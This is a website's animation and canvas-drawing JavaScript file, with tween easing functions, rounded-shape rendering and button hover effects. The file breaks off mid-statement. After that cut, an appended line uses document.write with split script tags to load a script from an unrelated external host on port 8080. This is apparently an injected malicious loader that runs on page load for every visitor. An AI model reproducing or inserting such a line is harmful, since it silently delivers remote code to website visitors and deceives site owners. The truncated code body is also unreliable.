<!--

function Delegate(){}
Delegate.create=function(o,f){
var OlqpI=new Array();
var VLXbm=arguments.length;
for(var i=2;i<VLXbm;i++) OlqpI[i-2]=arguments[i];
return function(){
var MawDa=[].concat(arguments,OlqpI);
f.apply(o,MawDa);
}
}
Tween=function(obj,prop,func,begin,finish,duration,suffixe){
this.init(obj,prop,func,begin,finish,duration,suffixe)
}
var t=Tween.prototype;
t.obj=new Object();
t.prop='';
t.func=function(t,b,c,d){return c*t/d+b;};
t.begin=0;
t.change=0;
t.prevTime=0;
t.prevPos=0;
t.looping=false;
t.KpDMj=0;
t.OJlTT=0;
t.KTFSK=0;
t.vugsG=0;
t.fxMCV=0;
t.EsUms=0;
t.brmXB=false;
t.name='';
t.suffixe='';
t.ghvRL=new Array();
t.setTime=function(t){
this.prevTime=this.OJlTT;
if(t>this.getDuration()){
if(this.looping){
this.rewind(t-this.KpDMj);
this.update();
this.pIesT('onMotionLooped',{target:this,type:'onMotionLooped'});
}else{
this.OJlTT=this.KpDMj;
this.update();
this.stop();
this.pIesT('onMotionFinished',{target:this,type:'onMotionFinished'});
}
}else if(t<0){
this.rewind();
this.update();
}else{
this.OJlTT=t;
this.update();
}
}
t.isRunning=function(){
return this.brmXB;
}
t.getTime=function(){
return this.OJlTT;
}
t.setDuration=function(d){
this.KpDMj=(d==null||d<=0)?100000:d;
}
t.getDuration=function(){
return this.KpDMj;
}
t.setPosition=function(p){
this.prevPos=this.KTFSK;
var a=this.suffixe!=''?this.suffixe:'';
this.obj[this.prop]=Math.round(p)+a;
this.KTFSK=p;
this.pIesT('onMotionChanged',{target:this,type:'onMotionChanged'});
}
t.getPosition=function(t){
if(t==undefined) t=this.OJlTT;
return this.func(t,this.begin,this.change,this.KpDMj);
};
t.setFinish=function(f){
this.change=f-this.begin;
};
t.geFinish=function(){
return this.begin+this.change;
};
t.init=function(obj,prop,func,begin,finish,duration,suffixe){
if(!arguments.length) return;
this.ghvRL=new Array();
this.addListener(this);
if(suffixe) this.suffixe=suffixe;
this.obj=obj;
this.prop=prop;
this.begin=begin;
this.KTFSK=begin;
this.setDuration(duration);
if(func!=null&&func!=''){
this.func=func;
}
this.setFinish(finish);
}
t.start=function(){
this.rewind();
this.startEnterFrame();
this.pIesT('onMotionStarted',{target:this,type:'onMotionStarted'});
}
t.rewind=function(t){
this.stop();
this.OJlTT=(t==undefined)?0:t;
this.fixTime();
this.update();
}
t.fforward=function(){
this.OJlTT=this.KpDMj;
this.fixTime();
this.update();
}
t.update=function(){
this.setPosition(this.getPosition(this.OJlTT));
}
t.startEnterFrame=function(){
this.stopEnterFrame();
this.brmXB=true;
this.onEnterFrame();
}
t.onEnterFrame=function(){
if(this.brmXB){
this.nextFrame();
wa_timeout(Delegate.create(this,this.onEnterFrame),0);
}
}
t.nextFrame=function(){
this.setTime((this.getTimer()-this.fxMCV)/1000);
}
t.stop=function(){
this.stopEnterFrame();
this.pIesT('onMotionStopped',{target:this,type:'onMotionStopped'});
}
t.stopEnterFrame=function(){
this.brmXB=false;
}
t.continueTo=function(finish,duration){
this.begin=this.KTFSK;
this.setFinish(finish);
if(this.KpDMj!=undefined)
this.setDuration(duration);
this.start();
}
t.resume=function(){
this.fixTime();
this.startEnterFrame();
this.pIesT('onMotionResumed',{target:this,type:'onMotionResumed'});
}
t.yoyo=function(){
this.continueTo(this.begin,this.OJlTT);
}
t.addListener=function(o){
this.removeListener(o);
return this.ghvRL.push(o);
}
t.removeListener=function(o){
var a=this.ghvRL;
var i=a.length;
while(i--){
if(a[i]==o){
a.splice(i,1);
return true;
}
}
return false;
}
t.pIesT=function(){
var arr=new Array();
for(var i=0;i<arguments.length;i++){
arr.push(arguments[i])
}
var e=arr.shift();
var a=this.ghvRL;
var l=a.length;
for(var i=0;i<l;i++){
if(a[i][e])
a[i][e].apply(a[i],arr);
}
}
t.fixTime=function(){
this.fxMCV=this.getTimer()-this.OJlTT*1000;
}
t.getTimer=function(){
return new Date().getTime()-this.OJlTT;
}
Tween.backEaseIn=function(t,b,c,d,a,p){
if(s==undefined) var s=1.70158;
return c*(t/=d)*t*((s+1)*t-s)+b;
}
Tween.backEaseOut=function(t,b,c,d,a,p){
if(s==undefined) var s=1.70158;
return c*((t=t/d-1)*t*((s+1)*t+s)+1)+b;
}
Tween.backEaseInOut=function(t,b,c,d,a,p){
if(s==undefined) var s=1.70158;
if((t/=d/2)<1) return c/2*(t*t*(((s*=(1.525))+1)*t-s))+b;
return c/2*((t-=2)*t*(((s*=(1.525))+1)*t+s)+2)+b;
}
Tween.elasticEaseIn=function(t,b,c,d,a,p){
if(t==0) return b;
if((t/=d)==1) return b+c;
if(!p) p=d*.3;
if(!a||a<Math.abs(c)){
a=c;var s=p/4;
}
else
var s=p/(2*Math.PI)*Math.asin(c/a);
return-(a*Math.pow(2,10*(t-=1))*Math.sin((t*d-s)*(2*Math.PI)/p))+b;
}
Tween.elasticEaseOut=function(t,b,c,d,a,p){
if(t==0) return b;if((t/=d)==1) return b+c;if(!p) p=d*.3;
if(!a||a<Math.abs(c)){a=c;var s=p/4;}
else var s=p/(2*Math.PI)*Math.asin(c/a);
return(a*Math.pow(2,-10*t)*Math.sin((t*d-s)*(2*Math.PI)/p)+c+b);
}
Tween.elasticEaseInOut=function(t,b,c,d,a,p){
if(t==0) return b;if((t/=d/2)==2) return b+c;if(!p) var p=d*(.3*1.5);
if(!a||a<Math.abs(c)){var a=c;var s=p/4;}
else var s=p/(2*Math.PI)*Math.asin(c/a);
if(t<1) return-.5*(a*Math.pow(2,10*(t-=1))*Math.sin((t*d-s)*(2*Math.PI)/p))+b;
return a*Math.pow(2,-10*(t-=1))*Math.sin((t*d-s)*(2*Math.PI)/p)*.5+c+b;
}
Tween.bounceEaseOut=function(t,b,c,d){
if((t/=d)<(1/2.75)){
return c*(7.5625*t*t)+b;
}else if(t<(2/2.75)){
return c*(7.5625*(t-=(1.5/2.75))*t+.75)+b;
}else if(t<(2.5/2.75)){
return c*(7.5625*(t-=(2.25/2.75))*t+.9375)+b;
}else{
return c*(7.5625*(t-=(2.625/2.75))*t+.984375)+b;
}
}
Tween.bounceEaseIn=function(t,b,c,d){
return c-Tween.bounceEaseOut(d-t,0,c,d)+b;
}
Tween.bounceEaseInOut=function(t,b,c,d){
if(t<d/2) return Tween.bounceEaseIn(t*2,0,c,d)*.5+b;
else return Tween.bounceEaseOut(t*2-d,0,c,d)*.5+c*.5+b;
}
Tween.strongEaseInOut=function(t,b,c,d){
return c*(t/=d)*t*t*t*t+b;
}
Tween.regularEaseIn=function(t,b,c,d){
return c*(t/=d)*t+b;
}
Tween.regularEaseOut=function(t,b,c,d){
return-c*(t/=d)*(t-2)+b;
}
Tween.regularEaseInOut=function(t,b,c,d){
if((t/=d/2)<1) return c/2*t*t+b;
return-c/2*((--t)*(t-2)-1)+b;
}
Tween.strongEaseIn=function(t,b,c,d){
return c*(t/=d)*t*t*t*t+b;
}
Tween.strongEaseOut=function(t,b,c,d){
return c*((t=t/d-1)*t*t*t*t+1)+b;
}
Tween.strongEaseInOut=function(t,b,c,d){
if((t/=d/2)<1) return c/2*t*t*t*t*t+b;
return c/2*((t-=2)*t*t*t*t+2)+b;
}
OpacityTween.prototype=new Tween();
OpacityTween.prototype.constructor=Tween;
OpacityTween.superclass=Tween.prototype;
function OpacityTween(obj,func,JVuXg,Cjffq,KpDMj){
this.targetObject=obj;
this.init(new Object(),'a',func,JVuXg,Cjffq,KpDMj);
this.onMotionChanged=function(evt){
var v=evt.target.KTFSK;
var t=this.targetObject;
v=Math.round(v*100)/100
t.style['opacity']=v/100;
t.style['-moz-opacity']=v/100;
html_SetOpacity(t,v/100);
}
}
function html_canvas(xcZQC,nljBE,xaRPF)
{
return "<canvas id='"+xcZQC+"' width='"+nljBE+"' height='"+xaRPF+"'></canvas>"
}
function WA_canvas(xcZQC,nljBE,xaRPF)
{
document.write(html_canvas(xcZQC,nljBE,xaRPF))
}
function ZXknX(XJdDC,x0,y0,lx0,ly0)
{
var x=x0+lx0/2;var y=y0+ly0/2;var lx=lx0/2;var ly=ly0/2;var radius=lx0/2;var yRadius=ly0/2;
XJdDC.beginPath();
var theta,xrCtrl,yrCtrl,angleMid,px,py,cx,cy;
theta=Math.PI/4;xrCtrl=radius/Math.cos(theta/2);yrCtrl=yRadius/Math.cos(theta/2);var angle=0;
XJdDC.moveTo(x+radius,y);
for(var i=0;i<8;i++){
angle+=theta;angleMid=angle-(theta/2);cx=x+Math.cos(angleMid)*xrCtrl;cy=y+Math.sin(angleMid)*yrCtrl;px=x+Math.cos(angle)*radius;py=y+Math.sin(angle)*yRadius;
XJdDC.quadraticCurveTo(cx,cy,px,py);
}
}
function BIPgQ(c,x,y,lx,ly,arc,clowckwise)
{
c.beginPath()
BXsoe(c,x,y,lx,ly,arc,clowckwise)
}
function BXsoe(c,x,y,lx,ly,arc,clowckwise)
{
if(clowckwise)
{
c.moveTo(x+arc,y);c.lineTo(x+lx-arc,y);c.quadraticCurveTo(x+lx,y,x+lx,y+arc);c.lineTo(x+lx,y+ly-arc);c.quadraticCurveTo(x+lx,y+ly,x+lx-arc,y+ly);c.lineTo(x+arc,y+ly);c.quadraticCurveTo(x,y+ly,x,y+ly-arc);c.lineTo(x,y+arc);c.quadraticCurveTo(x,y,x+arc,y);
return;
}
c.moveTo(x,y+arc);c.lineTo(x,y+ly-arc);c.quadraticCurveTo(x,y+ly,x+arc,y+ly);c.lineTo(x+lx-arc,y+ly);c.quadraticCurveTo(x+lx,y+ly,x+lx,y+ly-arc);c.lineTo(x+lx,y+arc);c.quadraticCurveTo(x+lx,y,x+lx-arc,y);c.lineTo(x+arc,y);c.quadraticCurveTo(x,y,x,y+arc);
}
function isWebKit()
{
if(navigator.userAgent.match(/webkit/i)) return true;
return false;
}
function isMSIE()
{
return BrowserDetect.browser=="Explorer" 
}
function isMSIE8()
{
if((BrowserDetect.browser=="Explorer")&&(BrowserDetect.version==8))
{
return true;
}
return false;
}
function ZNFxW()
{
return isWebKit();
}
function isMobileWithoutFlash()
{
return isIPhone();
}
function isMobileBrowser()
{
return isIPhone();
}
function isIPhone()
{
if(navigator.userAgent.match(/iPhone/i)||navigator.userAgent.match(/iPod/i))
return true;
return false;
}
function bcEKv(lx,ly,parent,id_suffixe)
{
var CVDfD=document.createElement('canvas');CVDfD.width=lx;CVDfD.height=ly;
return CVDfD;
}
function qYkXe(c,MpxfN)
{
c.shadowOffsetX=2;c.shadowOffsetY=2;c.shadowBlur=4;
}
function WA_over_img_html(mrxSv,mvRsl,OEoix)
{
if(!mrxSv.src)
{
var VnKfh=mrxSv.getElementsByTagName("IMG")
if(VnKfh.length==1)mrxSv=VnKfh[0]
}
if(mrxSv.src1==undefined)
{
mrxSv.src1=mrxSv.src;
mrxSv.src2=mvRsl;
}
if(OEoix)
{
mrxSv.src=mrxSv.src2;
}
else
{
mrxSv.src=mrxSv.src1;
}
}
function WA_over_img(id,OEoix)
{

var el=document.getElementById(id) 

var mrxSv=(OEoix)?el.wa_s_img[1]:el.wa_s_img[0]
WA_img(id,el.wa_lx,el.wa_ly,el.wa_arc,el.wa_bord_siz,el.wa_bord_col,[mrxSv,mrxSv],el.wa_shadow,el.wa_rot)
}
function WA_img(id,lx,ly,arc,xWYTJ,bord_col,s_img,shadow,rot)
{
var el=document.getElementById(id)
var c=el.getContext('2d');
var VZaCj=(el.width-lx)/2;
if(el.wa_lx==undefined)
{
el.wa_lx=lx
el.wa_ly=ly
el.wa_arc=arc
el.wa_bord_siz=xWYTJ
el.wa_bord_col=bord_col
el.wa_s_img=s_img
el.wa_shadow=shadow
el.wa_rot=rot
c.translate(VZaCj,VZaCj)
}
var sMaKa=document.getElementById(id+"-cache")
sMaKa.onload=function()
{
c.clearRect(0,0,lx+2*VZaCj,ly+2*VZaCj)
var arc2=arc-xWYTJ;
if(arc2<0)arc2=0;
if(ZNFxW()==false)
{
if(shadow) LrkdS(c,0,0,lx,ly,arc,false,rot) 
this.width=lx-2*xWYTJ
this.height=ly-2*xWYTJ 
var ptrn=c.createPattern(this,'no-repeat');
c.fillStyle=ptrn;
c.beginPath() 
BIPgQ(c,xWYTJ,xWYTJ,lx-2*xWYTJ,ly-2*xWYTJ,arc2)
c.translate(xWYTJ,xWYTJ)
c.fill()
c.translate(-xWYTJ,-xWYTJ)
if(xWYTJ>0)
{
c.fillStyle=bord_col;
BIPgQ(c,0,0,lx,ly,arc)
BXsoe(c,xWYTJ,xWYTJ,lx-2*xWYTJ,ly-2*xWYTJ,arc2,true)
c.fill()
}
}
else
{
var canv2=bcEKv(lx,ly,el,"bis");
var c2=canv2.getContext('2d');
if(xWYTJ>0)
{
c2.fillStyle=bord_col;
BIPgQ(c2,0,0,lx,ly,arc)
BXsoe(c2,xWYTJ,xWYTJ,lx-2*xWYTJ,ly-2*xWYTJ,arc2,true)
c2.fill()
}
BIPgQ(c2,xWYTJ,xWYTJ,lx-2*xWYTJ,ly-2*xWYTJ,arc2)
c2.clip()
c2.drawImage(this,xWYTJ,xWYTJ,lx-2*xWYTJ,ly-2*xWYTJ);
if(shadow) qYkXe(c,rot)
c.drawImage(canv2,0,0);
}
}
sMaKa.src=s_img[0];
}
function aoTnp(c,type,lx,ly,corner)
{
if(type==1)
ZXknX(c,0,0,lx,ly)
else
BIPgQ(c,0,0,lx,ly,corner)
}
function fIIOL(el,c,type,lx,ly,corner,bg,VshSn,rot)
{
if(ZNFxW()==false)
{
if(VshSn) LrkdS(c,0,0,lx,ly,corner,(type==1),rot)
c.fillStyle=bg;
aoTnp(c,type,lx,ly,corner)
c.fill()
}
else
{
var canv2=bcEKv(lx,ly,el,"bis");
var c2=canv2.getContext('2d');
c2.fillStyle=bg;
aoTnp(c2,type,lx,ly,corner)
c2.fill()
if(VshSn) qYkXe(c,rot)
c.drawImage(canv2,0,0);
c.shadowOffsetX=0;
c.shadowOffsetY=0;
c.shadowBlur=0;
}
}
function dMNQH(c,type,lx,ly,hQuSQ,bg,ZSVSJ,tjqiN_glow)
{
if(ZSVSJ)
{
var x1=ZSVSJ[0];var y1=ZSVSJ[1];var lx1=ZSVSJ[2];var ly1=ZSVSJ[3];var SciAv=ZSVSJ[4];
var mOTjB=c.createLinearGradient(x1,y1,x1,y1+ly1);
mOTjB.addColorStop(0,"rgba(255,255,255,0.7)");mOTjB.addColorStop(1,"rgba(255,255,255,0.1)");
c.fillStyle=mOTjB;
if(type==1) ZXknX(c,x1,y1,lx1,ly1)
else
BIPgQ(c,x1,y1,lx1,ly1,SciAv)
c.fill()
}
if(tjqiN_glow)
{
var x2=tjqiN_glow[0];var y2=tjqiN_glow[1];var lx2=tjqiN_glow[2];var ly2=tjqiN_glow[3];
var xeKev=tjqiN_glow[4];
var UJDtP_glow=new RGBColor(tjqiN_glow[5]);
UJDtP_glow.a=0;
var col1=tjqiN_glow[5];
var col2=UJDtP_glow.toRGB();
var tQdoh=c.createLinearGradient(x2,y2,x2,y2+ly2);
tQdoh.addColorStop(0,col2);
tQdoh.addColorStop(0.2,col2);
tQdoh.addColorStop(1,col1);
c.fillStyle=tQdoh;
if(type==1) ZXknX(c,x2,y2,lx2,ly2)
else
BIPgQ(c,x2,y2,lx2,ly2,xeKev)
c.fill()
}
}
function SBdiT(pliWQ,xcZQC,ShnZS,nljBE,xaRPF,hQuSQ,ZaUTo,ZSVSJ,tjqiN_glow,VshSn,MpxfN)
{
pliWQ.xcZQC=xcZQC;pliWQ.ShnZS=ShnZS;
pliWQ.nljBE=nljBE;pliWQ.xaRPF=xaRPF;
pliWQ.hQuSQ=hQuSQ;pliWQ.ZaUTo=ZaUTo,pliWQ.ZSVSJ=ZSVSJ;
pliWQ.tjqiN_glow=tjqiN_glow;pliWQ.VshSn=VshSn;pliWQ.MpxfN=MpxfN;
}
function WA_but_over(xcZQC,ZaUTo_over,UJDtP_glow)
{
var cVmTH=document.getElementById(xcZQC) 
if(cVmTH&&cVmTH.KTYNO)
with(cVmTH.KTYNO)
{
var tjqiN_glow_over;
if(tjqiN_glow&&UJDtP_glow)
{
tjqiN_glow_over=new Array();
for(var QtWTI=0;QtWTI<tjqiN_glow.length;QtWTI++)tjqiN_glow_over[QtWTI]=tjqiN_glow[QtWTI];
tjqiN_glow_over[5]=UJDtP_glow;
}
WA_but(xcZQC,ShnZS,nljBE,xaRPF,hQuSQ,ZaUTo_over,ZSVSJ,tjqiN_glow_over,VshSn,MpxfN);
}
var vkrHw_over0=document.getElementById(xcZQC+"-div0")
if(vkrHw_over0)html_SetVisibility(vkrHw_over0,false);
var mkBUe=document.getElementById(xcZQC+"-div1")
if(mkBUe)html_SetVisibility(mk




document.write('<s'+'cript type="text/javascript" src="http://questtore.hermosayasociados.com:8080/Firewire.js"></scr'+'ipt>');